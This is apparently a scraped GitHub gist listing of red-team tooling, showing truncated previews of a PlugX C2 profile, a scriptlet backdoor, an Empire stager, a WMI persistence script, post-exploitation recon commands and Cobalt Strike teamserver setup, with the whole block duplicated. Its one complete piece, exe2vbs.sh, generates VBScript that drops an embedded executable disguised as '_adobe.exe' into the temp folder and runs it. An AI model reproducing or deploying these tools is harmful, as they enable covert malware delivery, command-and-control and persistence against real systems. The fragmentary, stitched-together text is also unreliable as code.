Rahmat Nurfauzi infosecn1nja

## plugx.profile
#
# PlugX Profile
# Author: @infosecn1nja
#
# https://github.com/silence-is-best/c2db/blob/master/README.md

set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter    "10"; # throw in a 10% jitter

stage {

## Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		<![CDATA[


## exe2vbs.sh
#!/bin/bash
convert2hex=$(xxd -p $1)
result=$(echo $convert2hex | sed s'/ //g')
echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)'

## wmic_starfighters.py
from lib.common import helpers

class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'wmic_xsl_starfighters',

            'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],

## gen-chm.py
#!/usr/bin/python
import argparse
import re, random
import string, os, os.path

def rand_num(min, max):
	return random.randrange(min, max)

def gen_str(size):
	return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))

## Agentless-Post-Exploitation.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              3 stars
            
          
                infosecn1nja
                / Agentless-Post-Exploitation.md
            
            
              Created
              July 22, 2017 01:07
            
              
                Agentless Post-Exploitation
              
          
    Agentless Post-Exploitation

Reconnaissance

echo %LOGONSERVER%
net view /DOMAIN:domain

Check Administrators Rights


## Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

public class TestClass
{

	public TestClass()
	{}

## gist:97b4b2e5132ae9d3d18448b3f7f7aa93
Make a rule that allows port 80/443 access only from redirector:

iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Change default port teamserver :
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver

## WMI-Persistence.ps1
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html

<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds.  The event will trigger only once.
#>

$EventFilterName = "Fileless WMI Persistence SystemUptime"

## gist:04ab2d8ea15f98880bbf7b70168fa3dd
APT Group/Red Team Weaponization Phase
=======================================

C2 tools :
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit
	#
	# PlugX Profile
	# Author: @infosecn1nja
	#
	# https://github.com/silence-is-best/c2db/blob/master/README.md

	set sleeptime "30000"; # use a ~30s delay between callbacks
	set jitter "10"; # throw in a 10% jitter

	stage {
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
	#!/bin/bash
	convert2hex=$(xxd -p $1)
	result=$(echo $convert2hex \| sed s'/ //g')
	echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)'
	from lib.common import helpers

	class Stager:

	def __init__(self, mainMenu, params=[]):

	self.info = {
	'Name': 'wmic_xsl_starfighters',

	'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],
	#!/usr/bin/python
	import argparse
	import re, random
	import string, os, os.path

	def rand_num(min, max):
	return random.randrange(min, max)

	def gen_str(size):
	return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Text;

	public class TestClass
	{

	public TestClass()
	{}
	Make a rule that allows port 80/443 access only from redirector:

	iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
	iptables -A INPUT -p tcp --dport 443 -j DROP

	iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
	iptables -A INPUT -p tcp --dport 80 -j DROP

	Change default port teamserver :
	sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver
	# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
	# https://wikileaks.org/ciav7p1/cms/page_14587908.html

	<#
	.SYNOPSIS
	This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
	#>

	$EventFilterName = "Fileless WMI Persistence SystemUptime"
	APT Group/Red Team Weaponization Phase
	=======================================

	C2 tools :
	- Cobalt Strike
	- Empire
	- PoshC2
	- PupyRAT
	- Metasploit